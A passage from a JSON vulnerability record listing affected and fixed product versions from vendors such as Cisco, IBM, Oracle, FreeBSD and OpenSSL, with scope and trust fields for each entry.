"version": "5.2.1" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.2" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.26" }, { "model": "mediasense 9.0", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "abyp-4tl-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "cognos business intelligence interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.119" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "aspera shares", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.9.6" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.0.0" }, { "model": "10.1-release-p26", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.8" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.2" }, { "model": "prime collaboration assurance sp1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "tivoli netcool system service monitors fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1)" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.16" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "intelligent automation for cloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3361" }, { "model": "10.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "prime security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.5.4.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.13-34" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "im and presence service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "ata analog telephone adaptor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1879.2.5" }, { "model": "tivoli netcool system service monitors fp15", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5(2)" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.1" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs central 1.5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration deployment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "series ip phones vpn feature", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8800-11.5.2" }, { "model": "mobile foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.1" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3394" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.2" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "project openssl 1.0.1t", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p28", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "webex recording playback client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.3-release-p38", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "mysql enterprise backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.10.1" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.2" }, { "model": "9.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90008.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.16-37" }, { "model": "10.2-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "opensuse evergreen", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11.4" }, { "model": "prime infrastructure standalone plug and play gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa50x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.014-01" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.5.1" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.4" }, { "model": "telepresence integrator c series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "anyconnect secure mobility client", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.1" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87100" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.1" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4-23" }, { "model": "10.2-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.25-57" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-109" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.18-43" }, { "model": "cloud manager with openstack interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "workload deployer if12", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.7" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus intercloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.5" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.1" }, { "model": "ips", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4.2" }, { "model": "unified workforce optimization quality management sr3 es5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "qradar", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "meetingplace", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.7" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.1" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.2" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.0.1.7" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "webex messenger service ep1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.9.9" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.3" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "mediasense", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8961" }, { "model": "10.2-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified wireless ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.1-release-p27", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "spa122 ata with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "webex meeting center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "webex node for mcs", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.12.9.8" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2.8" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.20" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "10.2-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloud manager with openstack interix fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media players series 5.4 rb", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.11-28" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "qradar", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.31" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.5" }, { "model": "prime optical for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "pureapplication system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.2.1" }, { "model": "abyp-2t-1s-1l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.17" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.19" }, { "model": "project openssl 1.0.1r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.3" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "aspera console", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.1" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.0.997" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.3" }, { "model": "unified ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "lancope stealthwatch flowsensor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected analytics for collaboration 1.0.1q", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "abyp-2t-1s-1l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(2)" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "mmp server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.0-13" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "abyp-10g-2sr-2lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "unified communications for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.6.7" }, { "model": "prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.3.4.2-4" }, { "model": "anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.6.1" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70104.4" }, { "model": "packet tracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2" }, { "model": "openssh for gpfs for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.0.31" }, { "model": "agent for openflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.0.7" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "cognos business intelligence interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.117" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(3)" }, { "model": "globalprotect agent", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "3.1.0" }, { "model": "webex meetings for wp8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.0" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.54" }, { "model": "abyp-2t-2s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "webex meetings for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.1" }, { "model": "mds series multilayer switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "ios software and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3.1" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "webex meeting center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.0.5" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.15-36" }, { "model": "ace application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.0" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.10" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1)" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "mobile foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings client hosted t31r1sp6", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "cloud manager with openstack interim fix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "9.3-release-p35", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.8" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3x000" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "packet tracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "unified sip proxy", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.12" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.9.3" }, { "model": "abyp-0t-4s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "10.2-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "spa50x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "abyp-4ts-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5" }, { "model": "ata series analog terminal adaptor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.0" }, { "model": "digital media players series 5.4 rb", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.4" }, { "model": "virtualization experience media engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "abyp-10g-4lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3200" }, { "model": "abyp-10g-4lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.8" }, { "model": "9.3-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.6" }, { "model": "unified communications for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa122 ata with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli composite application manager for transactions if03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4" }, { "model": "identity services engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2.1" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.2" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "10.1-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.7" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.2" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(2.10000.5)" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.0" }, { "model": "telepresence mx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3204.4" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, 